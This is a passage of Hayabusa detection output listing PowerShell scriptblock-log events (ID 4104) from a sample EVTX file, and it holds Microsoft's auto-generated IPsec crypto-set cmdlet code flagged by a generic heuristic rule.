($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery')",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, 